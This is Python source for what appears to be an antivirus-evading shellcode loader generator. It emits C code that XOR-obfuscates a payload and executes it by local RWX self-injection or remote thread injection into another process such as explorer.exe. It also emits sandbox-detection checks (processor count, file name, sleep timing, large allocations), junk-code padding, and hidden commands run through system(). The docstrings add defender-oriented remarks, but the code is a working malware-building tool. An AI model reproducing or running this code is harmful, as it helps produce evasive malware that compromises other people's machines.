def local_thread_injection(vShellcode: str, decoder_stub: str, junkcode: str, intensity) -> str:
    """Append the in-process execution fragment to ``decoder_stub``.

    The emitted C is the textbook self-injection sequence: a ``VirtualAlloc``
    with ``PAGE_EXECUTE_READWRITE``, a ``memcpy`` of the decoded buffer into
    it, and an indirect call through a cast function pointer. The private
    RWX allocation that is subsequently executed from is the artifact that
    memory-allocation telemetry and memory scanners key on. Output of
    ``junk.junk_inject`` is interleaved between the three statements.

    Args:
        vShellcode: C identifier of the decoded byte array (as produced by
            ``xor_encryption``); it is used with ``sizeof``, so it is expected
            to name an array rather than a pointer.
        decoder_stub: C source the fragment is appended to.
        junkcode: junk-code switch, passed through to ``junk.junk_inject``.
        intensity: junk-code intensity, passed through to ``junk.junk_inject``.

    Returns:
        ``decoder_stub`` followed by the injection statements and a closing
        ``}``. The matching ``{`` is not opened in this function; presumably
        it comes from ``decoder_stub``/``body_builder`` — confirm with caller.
    """
    execs = core.varname_creator()  # randomised identifier for the RWX buffer
    lti = decoder_stub
    lti += junk.junk_inject(junkcode, "code", intensity)
    # Allocation size is `sizeof vShellcode`, i.e. the declared array length.
    lti += "\nvoid *" + execs + " = VirtualAlloc(0, sizeof " + vShellcode + ", MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n"
    lti += junk.junk_inject(junkcode, "code", intensity)
    lti += "memcpy(" + execs + ", " + vShellcode + ", sizeof " + vShellcode + ");\n"
    lti += junk.junk_inject(junkcode, "code", intensity)
    # Control transfer into the buffer through a function-pointer cast.
    lti += "((void(*)())" + execs + ")();\n"
    # Closes a block opened outside this function (see docstring).
    lti += "}\n"
    return lti
def mono_core(junkcode: str, intensity) -> tuple[str, str]:
    """Emit a C function that exits unless a small ``VirtualAllocEx`` succeeds.

    Despite the name, no processor-count check is generated here (that is
    ``number_of_core``). The function reserves and commits 1000 bytes of RWX
    memory in the current process, prints a random identifier when the
    allocation worked and calls ``exit(0)`` otherwise. The allocation is
    never freed. Junk statements are interleaved throughout.

    Args:
        junkcode: junk-code switch, passed through to ``junk.junk_inject``.
        intensity: junk-code intensity, passed through to ``junk.junk_inject``.

    Returns:
        ``(evasion_funcname, evasion_func)``: the ``void <name>(void)`` line
        after ``replace_string`` (defined elsewhere in the project) has been
        applied to it, and the complete C function text.
    """
    evasion_funcname = "void " + core.varname_creator() + "(void)\n"
    mem2 = core.varname_creator()

    evasion_func = evasion_funcname
    evasion_func += "{\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += "LPVOID " + mem2 + "= NULL;\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    # Fixed 1000-byte RWX allocation in the current process; the result is only tested for NULL.
    evasion_func += mem2 + " = VirtualAllocEx(GetCurrentProcess(), NULL, 1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += "if (" + mem2 + " != NULL)\n"
    evasion_func += "{\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    # Success path prints a random token so the branch is not empty.
    evasion_func += 'printf("' + core.varname_creator() + '");\n'
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += '}\n'
    evasion_func += "else\n"
    evasion_func += "{\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    # Failed allocation ends the program silently.
    evasion_func += "exit(0);\n"
    evasion_func += "}\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += "}\n\n"

    # replace_string is not visible here; it is applied only to the prototype line.
    evasion_funcname = replace_string(evasion_funcname)
    return evasion_funcname, evasion_func
def xor_encryption(shellcode: str, junkcode: str, intensity) -> tuple[str, str]:
    """Emit the XOR-obfuscated payload array and the C loop that restores it.

    ``shellcode`` is parsed as ``\\xNN`` escapes, every byte is XORed with a
    randomly generated key of 64-127 decimal digits, and the result is
    emitted as an ``int`` array followed by the key (as a plain ``char[]``
    literal), both lengths, and a ``for`` loop that XORs the bytes back into
    an ``unsigned char`` array. This is obfuscation rather than encryption:
    key and ciphertext sit side by side in the generated source, so the
    payload is recoverable statically by replaying the same loop.

    Args:
        shellcode: string of ``\\xNN`` escapes. The pattern only matches
            lowercase hex digits; uppercase bytes are silently dropped.
        junkcode: junk-code switch, passed through to ``junk.junk_inject``.
        intensity: junk-code intensity, passed through to ``junk.junk_inject``.

    Returns:
        ``(vShellcode, final_stub)``: the C identifier of the decoded array
        and the C source that declares everything and fills it.
    """
    # `final_stub` first holds the parsed hex-pair list and is later reused for the C text.
    final_stub = findall('\\\\x([a-f0-9][a-f0-9])', shellcode)
    shellcode_len = len(final_stub)
    keylen = randrange(64, 128)
    # Key alphabet is decimal digits only; the key is embedded in cleartext below.
    password = ''.join(choice(digits) for i in range(keylen))

    vShellcode = core.varname_creator()
    vShellcodelen = core.varname_creator()
    vEshellcode = core.varname_creator()
    vPassword = core.varname_creator()
    vPasswordlen = core.varname_creator()

    # Variables
    # Byte i is XORed with key byte (i mod keylen); the C loop below mirrors this.
    final_stub = '\nint enc_shellcode[] = { ' + ', '.join([
        str(int(code, 16) ^ ord(password[(i % len(password))]))
        for i, code in enumerate(final_stub)
    ]) + ' };\n'
    final_stub += junk.junk_inject(junkcode, "code", intensity)
    # Placeholder name is swapped after junk was appended, so the replace also
    # runs over the junk text.
    final_stub = final_stub.replace("enc_shellcode", vEshellcode)
    final_stub += 'int ' + vShellcodelen + f' = {shellcode_len};\n'
    final_stub += junk.junk_inject(junkcode, "code", intensity)
    final_stub += 'char ' + vPassword + f'[] = "{password}";\n'
    final_stub += junk.junk_inject(junkcode, "code", intensity)
    final_stub += 'int ' + vPasswordlen + f'= {len(password)};\n'
    final_stub += junk.junk_inject(junkcode, "code", intensity)

    # Decoder stub
    # Variable-length array sized by the runtime `int` declared above.
    final_stub += "unsigned char " + vShellcode + "[" + vShellcodelen + "];\n"
    final_stub += junk.junk_inject(junkcode, "code", intensity)
    final_stub += "for(int i = 0; i < " + vShellcodelen + "; i++) {\n"
    final_stub += junk.junk_inject(junkcode, "code", intensity)
    final_stub += vShellcode + "[i] = (char) " + vEshellcode + "[i] ^ " + vPassword + "[i % " + vPasswordlen + "];\n}\n"
    final_stub += junk.junk_inject(junkcode, "code", intensity)

    return vShellcode, final_stub
def shuffle_funcname(top_funcname_code, junkcode, intensity):
    """Return the lines of ``top_funcname_code`` in random order, one per line.

    Every line is re-terminated with ``\\n``. When ``junkcode == "yes"`` the
    output of ``junk.junk_inject(junkcode, "code", intensity)`` is appended
    after each line. Ordering comes from ``random.shuffle`` and is therefore
    not reproducible between calls; an empty input yields ``""``.
    """
    lines = top_funcname_code.splitlines()
    shuffle(lines)
    inject_junk = junkcode == "yes"

    pieces = []
    for entry in lines:
        pieces.append(entry + "\n")
        if inject_junk:
            pieces.append(junk.junk_inject(junkcode, "code", intensity))

    return "".join(pieces)
def my_name_is(filename: str, junkcode: str, intensity) -> tuple[str, str]:
    """Emit a C function that exits unless ``argv[0]`` contains ``filename``.

    The generated function takes ``argv[0]`` (the ``(char *args)`` prototype
    is rewritten to ``(argv[0])`` for the call line) and calls ``exit(0)``
    when ``strstr`` does not find the build-time file name in it. A renamed
    copy therefore terminates early; when analysing such a sample, run it
    under its original name or neutralise this check. ``output/`` is stripped
    from ``filename`` so only the base name is compared.

    Args:
        filename: build output path; spliced unescaped into a C string
            literal, so quotes or backslashes in it break the output.
        junkcode: junk-code switch, passed through to ``junk.junk_inject``.
        intensity: junk-code intensity, passed through to ``junk.junk_inject``.

    Returns:
        ``(evasion_funcname, evasion_func)``: the call-site line after
        ``replace_string`` (defined elsewhere) has been applied, and the
        complete C function text.
    """
    evasion_funcname = "void " + core.varname_creator() + "(char *args)\n"

    b = core.varname_creator()
    filename = filename.replace('output/', '')
    evasion_func = evasion_funcname
    evasion_func += "{\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    # `strstr` returns a pointer; `> 0` is a pointer/int comparison that compilers accept with a warning.
    evasion_func += 'if (strstr(args, "' + filename + '") > 0)\n'
    evasion_func += "{\n"
    # Match branch only declares an unused variable so the block is not empty.
    evasion_func += "int " + b + " = 0;\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += "}\n"
    evasion_func += "else"  # no newline: emitted as `else{`, still valid C
    evasion_func += "{\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += "exit(0);\n"
    evasion_func += "}\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += "}\n\n"

    # Turn the prototype into the call-site form before replace_string runs on it.
    evasion_funcname = evasion_funcname.replace("(char *args)", "(argv[0])")
    evasion_funcname = replace_string(evasion_funcname)
    return evasion_funcname, evasion_func
def number_of_core(junkcode: str, intensity) -> tuple[str, str]:
    """Emit a C function that exits when fewer than two processors are reported.

    The generated code calls ``GetSystemInfo`` and ``exit(0)``s when
    ``dwNumberOfProcessors < 2`` — a common single-vCPU sandbox heuristic.
    Analysis environments that expose two or more processors are unaffected
    by this check. Junk statements are interleaved throughout.

    Args:
        junkcode: junk-code switch, passed through to ``junk.junk_inject``.
        intensity: junk-code intensity, passed through to ``junk.junk_inject``.

    Returns:
        ``(evasion_funcname, evasion_func)``: the ``void <name>(void)`` line
        after ``replace_string`` (defined elsewhere) has been applied to it,
        and the complete C function text.
    """
    evasion_funcname = "void " + core.varname_creator() + "(void)\n"
    sysguide = core.varname_creator()
    xcore = core.varname_creator()

    evasion_func = evasion_funcname
    evasion_func += "{\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += "SYSTEM_INFO " + sysguide + ";\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += "GetSystemInfo(&" + sysguide + ");\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += "int " + xcore + " = " + sysguide + ".dwNumberOfProcessors;\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    # Threshold is hard-coded: anything below 2 processors terminates the program.
    evasion_func += "if (" + xcore + " < 2)\n"
    evasion_func += "{\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += "exit(0);\n"
    evasion_func += "}\n"
    evasion_func += junk.junk_inject(junkcode, "code", intensity)
    evasion_func += "}\n\n"

    # replace_string is not visible here; it is applied only to the prototype line.
    evasion_funcname = replace_string(evasion_funcname)
    return evasion_funcname, evasion_func
def exercise_room(injection_type, processname: str, vShellcode: str, decoder_stub: str,
                  architecture, junkcode: str, intensity, evasions, decoys,
                  windows_firewall, windows_update, filename) -> str:
    """Assemble the complete C program text for one build.

    All optional pieces (evasion functions, junk functions, decoys, the
    post-exploit stub) are generated up front, unconditionally. Then, for
    ``injection_type`` ``"local"`` or ``"remote"``, the enabled pieces are
    collected together with their forward declarations, the execution
    fragment is produced by ``local_thread_injection`` or
    ``remote_thread_injection``, and everything is handed to
    ``body_builder`` (defined elsewhere). Any other ``injection_type``
    yields ``""``.

    Note that the junk/evasion bookkeeping is duplicated between the two
    branches, and the two ``remote`` sub-branches differ only in defaulting
    ``processname`` to ``"explorer.exe"`` when it is empty.

    Args:
        injection_type: ``"local"`` or ``"remote"``; anything else produces ``""``.
        processname: target image name for remote injection; empty selects the default.
        vShellcode: C identifier of the decoded payload array.
        decoder_stub: C source the execution fragment is appended to.
        architecture: forwarded to ``evasion.the_great_evasion``.
        junkcode: ``"yes"`` enables junk functions; forwarded to the helpers.
        intensity: junk-code intensity, forwarded to the helpers.
        evasions: ``"yes"`` includes the evasion functions.
        decoys: forwarded to ``decoy.fake_u`` (decoy count as a string there).
        windows_firewall: forwarded to ``postexploit.hidden_forever``.
        windows_update: forwarded to ``postexploit.hidden_forever``.
        filename: forwarded to ``evasion.the_great_evasion``.

    Returns:
        The generated C program text, or ``""`` for an unknown injection type.
    """
    exec_code = ""
    evasion_code = ""
    junkfunc_code = ""
    top_funcname_code = ""
    # Helpers run even when injection_type matches neither branch below.
    evasion_funcname, evasion_func = evasion.the_great_evasion(
        evasions, architecture, filename, junkcode, intensity)
    # In "func" mode junk_inject returns a (name, body) pair; "code" mode elsewhere yields a string.
    junkfuncname, junkcode_func = junk.junk_inject(junkcode, "func", intensity)
    decoy_code = decoy.fake_u(decoys, junkcode, intensity)
    xor_func, exec_stub = postexploit.hidden_forever(windows_firewall,
                                                     windows_update, junkcode,
                                                     intensity)
    final_code = ""

    if injection_type == "local":

        if junkcode == "yes":
            junkfunc_code += junkcode_func
            top_funcname_code += junkfuncname
            core.junkcode_added()
            core.junkfunc_added()

        if evasions == "yes":
            evasion_code += evasion_func
            top_funcname_code += evasion_funcname
            core.evasion_added()

        exec_code += local_thread_injection(vShellcode, decoder_stub, junkcode,
                                            intensity)
        final_code += body_builder(evasion_code, junkfunc_code,
                                   top_funcname_code, exec_code, decoy_code,
                                   xor_func, exec_stub, junkcode, intensity)

    elif injection_type == "remote":

        # Same bookkeeping as the "local" branch.
        if junkcode == "yes":
            junkfunc_code += junkcode_func
            top_funcname_code += junkfuncname
            core.junkcode_added()
            core.junkfunc_added()

        if evasions == "yes":
            evasion_code += evasion_func
            top_funcname_code += evasion_funcname
            core.evasion_added()

        if processname != "":
            exec_code += remote_thread_injection(processname, vShellcode,
                                                 decoder_stub, junkcode,
                                                 intensity)
            final_code += body_builder(evasion_code, junkfunc_code,
                                       top_funcname_code, exec_code,
                                       decoy_code, xor_func, exec_stub,
                                       junkcode, intensity)

        else:
            # Identical to the branch above apart from the default target name.
            processname = "explorer.exe"
            exec_code += remote_thread_injection(processname, vShellcode,
                                                 decoder_stub, junkcode,
                                                 intensity)
            final_code += body_builder(evasion_code, junkfunc_code,
                                       top_funcname_code, exec_code,
                                       decoy_code, xor_func, exec_stub,
                                       junkcode, intensity)

    return final_code
def remote_thread_injection(processname: str, vShellcode: str, decoder_stub: str, junkcode: str,
                            intensity) -> str:
    """Append the cross-process execution fragment to ``decoder_stub``.

    The emitted C enumerates processes with ``CreateToolhelp32Snapshot`` /
    ``Process32Next`` and, for every entry whose ``szExeFile`` equals
    ``processname`` case-insensitively, opens it with ``PROCESS_ALL_ACCESS``,
    allocates RWX memory in it with ``VirtualAllocEx``, copies the decoded
    buffer over with ``WriteProcessMemory`` and starts it with
    ``CreateRemoteThread``. That four-call chain against another process is
    what endpoint telemetry correlates as remote thread injection.

    Observations on the generated code: the entry filled by ``Process32First``
    is never compared (only ``Process32Next`` results are); the loop does not
    stop at the first match; the remote thread handle is never closed; and
    ``processname`` is spliced unescaped into a C string literal.

    Args:
        processname: target image name, compared with ``stricmp``.
        vShellcode: C identifier of the decoded byte array (used with ``sizeof``).
        decoder_stub: C source the fragment is appended to.
        junkcode: junk-code switch, passed through to ``junk.junk_inject``.
        intensity: junk-code intensity, passed through to ``junk.junk_inject``.

    Returns:
        ``decoder_stub`` followed by the enumeration/injection statements and
        a closing ``}`` whose opening brace is not emitted here (presumably
        provided by ``decoder_stub``/``body_builder`` — confirm with caller).
    """
    entry = core.varname_creator()
    snapshot = core.varname_creator()
    process_handle = core.varname_creator()
    remote_thread = core.varname_creator()
    remote_buffer = core.varname_creator()
    rti = decoder_stub
    rti += junk.junk_inject(junkcode, "code", intensity)
    rti += "\nPROCESSENTRY32 " + entry + ";\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    rti += entry + ".dwSize = sizeof(PROCESSENTRY32);\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    rti += "HANDLE " + snapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    # The first entry is only used as a success check; comparison starts at the next one.
    rti += "if (Process32First(" + snapshot + ", &" + entry + ") == TRUE)\n"
    rti += "{\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    rti += "while (Process32Next(" + snapshot + ", &" + entry + ") == TRUE)\n"
    rti += "{\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    # No trailing newline: the `{` on the next line lands on the same C line (still valid).
    rti += 'if (stricmp(' + entry + '.szExeFile, ' + '"' + processname + '"' + ') == 0)'
    rti += '{\n'
    rti += junk.junk_inject(junkcode, "code", intensity)
    rti += "HANDLE " + process_handle + ";\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    rti += "HANDLE " + remote_thread + ";\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    rti += "PVOID " + remote_buffer + ";\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    # Return values of the following calls are never checked.
    rti += process_handle + " = OpenProcess(PROCESS_ALL_ACCESS, FALSE, " + entry + ".th32ProcessID);\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    rti += remote_buffer + " = VirtualAllocEx(" + process_handle + ", NULL, sizeof " + vShellcode + ", (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    rti += "WriteProcessMemory(" + process_handle + ", " + remote_buffer + ", " + vShellcode + ", sizeof " + vShellcode + ", NULL);\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    rti += remote_thread + " = CreateRemoteThread(" + process_handle + ", NULL, 0, (LPTHREAD_START_ROUTINE)" + remote_buffer + ", NULL, 0, NULL);\n"
    rti += junk.junk_inject(junkcode, "code", intensity)
    # `}}}` closes the if / while / if blocks; only the process handle is closed.
    rti += "CloseHandle(" + process_handle + ");}}}\n"
    rti += "CloseHandle(" + snapshot + ");"
    # Closes a block opened outside this function (see docstring).
    rti += "}\n"
    return rti
def encrypt_exec(commands, junkcode: str, intensity) -> tuple[str, str]:
    """Emit a C XOR decoder function and an obfuscated command table run via ``system()``.

    The first returned string defines
    ``void <name>(int cmd[], int key[], int cmdlen, int keylen, char out[])``,
    which XORs ``cmd`` with ``key`` (cycled) into ``out`` and NUL-terminates
    it. The second generates a key of 1024-4095 decimal digits, obfuscates
    every command with ``xor_encrypt`` (not visible here; presumably returns
    a list of ints) and emits the key, the per-command lengths, a
    two-dimensional ``int`` table and a loop that decodes each row into a
    ``char`` buffer and passes it to ``system()``.

    As with ``xor_encryption`` the key is embedded right next to the data, so
    the commands are recoverable statically; at runtime the ``system()``
    calls (child shell processes) are the observable behaviour.

    Args:
        commands: iterable of command strings to obfuscate. Must be
            non-empty — ``max()`` below raises ``ValueError`` otherwise.
        junkcode: junk-code switch, passed through to ``junk.junk_inject``.
        intensity: junk-code intensity, passed through to ``junk.junk_inject``.

    Returns:
        ``(func_stub, code)``: the decoder function text and the table plus
        decode/execute loop text.
    """
    # Decryptor
    func_name = core.varname_creator()
    arg_command = core.varname_creator()
    arg_key = core.varname_creator()
    arg_command_lenght = core.varname_creator()
    arg_key_lenght = core.varname_creator()
    arg_exec = core.varname_creator()
    i = core.varname_creator()
    func_stub = "void " + func_name + "(int " + arg_command + "[], int " + arg_key + "[], int " + arg_command_lenght + ", int " + arg_key_lenght + ", char " + arg_exec + "[])\n"
    func_stub += "{\n"
    func_stub += junk.junk_inject(junkcode, "code", intensity)
    func_stub += "for(int " + i + " = 0; " + i + "< " + arg_command_lenght + "; " + i + "++)"
    func_stub += "{\n"
    func_stub += junk.junk_inject(junkcode, "code", intensity)
    func_stub += arg_exec + "[" + i + "] = " + arg_command + "[" + i + "] ^ " + arg_key + "[" + i + " % " + arg_key_lenght + "];\n"
    func_stub += junk.junk_inject(junkcode, "code", intensity)
    func_stub += "}\n"
    func_stub += junk.junk_inject(junkcode, "code", intensity)
    # NUL terminator; the output buffer is sized max_length + 1 below to leave room for it.
    func_stub += arg_exec + "[" + arg_command_lenght + "] = 0;\n"
    func_stub += junk.junk_inject(junkcode, "code", intensity)
    func_stub += "}\n"

    keylen = randrange(1024, 4096)
    key = ''.join(choice(digits) for i in range(keylen))
    cmd = list()
    for command in commands:
        cmd.append(xor_encrypt(command, key))

    vKeylen = core.varname_creator()
    vKey = core.varname_creator()
    vNumcommands = core.varname_creator()
    vSizeofcommands = core.varname_creator()
    vMaxcommandsize = core.varname_creator()
    vCommands = core.varname_creator()
    vExeccommands = core.varname_creator()
    i = core.varname_creator()  # fresh identifier for the second C loop (rebinds the Python name)
    code = "int " + vKeylen + f" = {len(key)};\n"
    code += junk.junk_inject(junkcode, "code", intensity)
    # Key emitted as its character codes; `str(list)[1:-1]` strips the brackets.
    code += "int " + vKey + f"[] = {{{str([ord(k) for k in key])[1:-1]}}};\n"
    code += junk.junk_inject(junkcode, "code", intensity)
    code += "int " + vNumcommands + f" = {len(commands)};\n"
    code += junk.junk_inject(junkcode, "code", intensity)
    code += "int " + vSizeofcommands + f"[] = {{{', '.join([str(len(data)) for data in cmd])}}};\n"
    code += junk.junk_inject(junkcode, "code", intensity)
    max_length = max([len(data) for data in cmd])
    code += "int " + vMaxcommandsize + f" = {max_length};\n"
    code += junk.junk_inject(junkcode, "code", intensity)
    # Rows shorter than max_length are zero-filled by the C initializer.
    code += "int " + vCommands + f"[][{max_length}] = {{{', '.join(['{' + str(cmds)[1:-1] + '}' for cmds in cmd])}}};\n"
    code += junk.junk_inject(junkcode, "code", intensity)
    code += "char " + vExeccommands + "[" + vNumcommands + "][" + vMaxcommandsize + " + 1];\n"
    code += junk.junk_inject(junkcode, "code", intensity)
    code += "for(int " + i + " = 0; " + i + " < " + vNumcommands + "; " + i + "++)\n"
    code += "{\n"
    code += junk.junk_inject(junkcode, "code", intensity)
    code += func_name + "(" + vCommands + "[" + i + "], " + vKey + ", " + vSizeofcommands + "[" + i + "], " + vKeylen + ", " + vExeccommands + "[" + i + "]);\n"
    code += junk.junk_inject(junkcode, "code", intensity)
    # Each decoded row is handed to the shell; no trailing newline after this statement.
    code += "system(" + vExeccommands + "[" + i + "]);"
    code += junk.junk_inject(junkcode, "code", intensity)
    code += "}\n"
    return func_stub, code
def fake_u(value, junkcode: str, intensity) -> str:
    """Emit ``int(value)`` decoy blocks, or ``""`` when ``value`` is empty.

    Each decoy allocates and zero-fills a random 30-330 MB heap buffer, then
    calls ``Sleep(1000)`` and compares ``GetTickCount`` before and after; if
    fewer than 1000 ms elapsed the program ``exit(0)``s. Together these act
    as resource and timing sandbox checks (large allocations, and detection
    of accelerated sleeps). ``core.decoy_added()`` is called once whenever
    ``value`` is non-empty, even for ``"0"``.

    Args:
        value: decoy count as a decimal string. ``int()`` raises
            ``ValueError`` for anything else, and a negative count never
            terminates the loop below (it compares with ``!=``, not ``<``).
        junkcode: junk-code switch, passed through to ``junk.junk_inject``.
        intensity: junk-code intensity, passed through to ``junk.junk_inject``.

    Returns:
        The concatenated C decoy statements, or ``""`` for an empty ``value``.
    """

    number_of_decoy = value

    if number_of_decoy != "":

        transform_to_int = int(number_of_decoy)

        # `number_of_decoy` is reused as the loop counter from here on.
        number_of_decoy = 0
        decoy_code = ""

        while number_of_decoy != transform_to_int:
            number_of_decoy += 1

            memdmp1 = core.varname_creator()
            tac1 = core.varname_creator()
            tick1 = core.varname_creator()

            # Byte count for malloc/memset; uses the `random` module (other blocks import names directly).
            memdmp1_value = str(random.randint(30000000, 330000000))
            decoy_code += "char * " + memdmp1 + "= NULL;\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            decoy_code += memdmp1 + " = (char *)malloc(" + memdmp1_value + ");\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            decoy_code += "if (" + memdmp1 + " != NULL)\n"
            decoy_code += "{\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            # `00` is an octal literal for zero; forces the pages to be touched.
            decoy_code += "memset(" + memdmp1 + ", 00, " + memdmp1_value + ");\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            decoy_code += "}\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            decoy_code += "int " + tick1 + " = GetTickCount();\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            decoy_code += "Sleep(1000);\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            decoy_code += "int " + tac1 + " = GetTickCount();\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            # Exit if the sleep appears to have been shortened.
            decoy_code += "if ((" + tac1 + " - " + tick1 + ") < 1000)\n"
            decoy_code += "{\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            decoy_code += "exit(0);\n"
            decoy_code += "}\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)
            decoy_code += "free(" + memdmp1 + ");\n"
            decoy_code += junk.junk_inject(junkcode, "code", intensity)

        core.decoy_added()

        return decoy_code

    # Always true when reached: the `if` above handled every non-empty value.
    elif number_of_decoy == "":
        return ""